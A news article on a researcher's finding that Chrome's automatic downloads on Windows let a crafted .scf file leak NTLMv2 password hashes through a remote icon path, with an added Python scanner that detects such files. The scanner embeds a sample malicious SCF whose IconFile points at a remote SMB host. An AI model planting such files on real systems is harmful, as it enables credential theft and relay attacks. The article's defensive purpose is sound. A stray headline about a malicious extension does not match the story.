Google is reportedly looking into the vulnerability.
Malicious Google Chrome extension collected user’s data for third parties
By Prempal Singh
A bug in Google’s popular Chrome web browser could allow attackers to place a malicious file on a target system that can then be used to steal Windows credentials and launch a Server Message Block (SMB) relay attack, according to a post by Bosko Stankovic, an information security engineer at DefenseCode.
Stankovic found the vulnerability in the default configuration of Chrome on all Windows versions that support the browser.
“With its default configuration, Chrome browser will automatically download files that it deems safe without prompting the user for a download location but instead using the preset one,” Stankovic wrote. This behaviour, he explained, is not ideal from a security standpoint, but for it to do any harm a user would normally still need to open and run the downloaded file.
The problem is that a Windows Explorer Shell Command File, or SCF (.scf), a small plain-text file that Explorer interprets, needs no interaction with the file itself: when the user merely opens the folder it was saved to, Explorer renders the directory listing and fetches the icon named in the file, and an icon path pointing at a remote SMB server tricks Windows into an authentication attempt against that server, which collects the victim’s username and NTLMv2 (NT LAN Manager v2) password hash, Stankovic wrote.
That can be enough, he explained, to mount attacks against accounts on Windows systems, since a captured NTLMv2 hash can be cracked offline if the password is weak. For organizations using Microsoft Exchange with NTLM authentication, the bug could also enable SMB relay attacks, in which the attacker impersonates the victim and gains access to network resources without ever knowing the password.
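The mechanism above depends on the `IconFile` entry of an SCF file pointing at a UNC path on an attacker-controlled host. The script below is an added example written for this article, not code from Stankovic or DefenseCode: it parses SCF files in INI style, flags any whose icon target is a remote path, and scans a downloads directory for them. The two sample SCF bodies and the 203.0.113.5 host are constructed for illustration; the file layout follows the `[Shell]` / `IconFile=` / `[Taskbar]` structure Windows expects.

```python
"""Flag Shell Command Files (.scf) whose IconFile points at a remote UNC path.

Explorer fetches the icon named in an SCF as soon as the containing folder is
opened; a UNC IconFile therefore forces an outbound SMB authentication attempt.
Added example for this article; the sample files and host below are constructed.
"""
import re
import tempfile
from pathlib import Path

# Constructed sample: IconFile on a remote host (TEST-NET-3 address, not a real server).
SAMPLE_MALICIOUS_SCF = (
    "[Shell]\r\nCommand=2\r\nIconFile=\\\\203.0.113.5\\share\\test.ico\r\n"
    "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
)
# Constructed sample resembling the legitimate "Show Desktop" SCF: local icon only.
SAMPLE_BENIGN_SCF = (
    "[Shell]\r\nCommand=2\r\nIconFile=%SystemRoot%\\system32\\SHELL32.dll,3\r\n"
    "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
)

# \\host\... (two leading backslashes, a host component, then a separator)
UNC_RE = re.compile(r"^\\\\[^\\]+\\")


def parse_scf(text):
    """Parse INI-style SCF text into {section: {key: value}}, keys lower-cased."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def icon_target(text):
    """Return the raw IconFile value from the [Shell] section, or None."""
    return parse_scf(text).get("shell", {}).get("iconfile")


def is_remote_icon(text):
    """True if the icon path would make Explorer contact a remote host."""
    target = icon_target(text)
    if target is None:
        return False
    # IconFile may carry a ",<index>" suffix and optional quotes; strip both.
    path = target.split(",")[0].strip().strip('"')
    if UNC_RE.match(path):
        return True
    # Defensive: forward-slash UNC and file:// forms are also resolved remotely.
    return path.startswith("//") or path.lower().startswith("file://")


def scan_directory(directory):
    """Return [(path, icon_target)] for every .scf under directory with a remote icon."""
    findings = []
    for path in Path(directory).rglob("*"):
        if path.is_file() and path.suffix.lower() == ".scf":
            try:
                text = path.read_bytes().decode("utf-8", errors="replace")
            except OSError:
                continue
            if is_remote_icon(text):
                findings.append((str(path), icon_target(text)))
    return findings


def demo():
    """Write the two constructed samples to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "invoice.scf").write_bytes(SAMPLE_MALICIOUS_SCF.encode())
        (Path(tmp) / "desktop.scf").write_bytes(SAMPLE_BENIGN_SCF.encode())
        return scan_directory(tmp)


if __name__ == "__main__":
    for found_path, target in demo():
        print(f"remote icon reference in {found_path}: {target}")
```

Pointing `scan_directory` at a user’s Downloads folder gives a quick audit of what Chrome has already saved; because the hash leaks the moment Explorer lists the folder, any hit should be treated as a credential exposure rather than a near miss.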
When a number of anti-virus solutions were tested, none flagged the downloaded file as suspicious.
To disable automatic downloads in Google Chrome, Stankovic recommended enabling the following option: Settings -> Show advanced settings -> check “Ask where to save each file before downloading”.
“Manually approving each download attempt significantly reduces the risk of NTLMv2 credential theft attacks using SCF files,” he explained.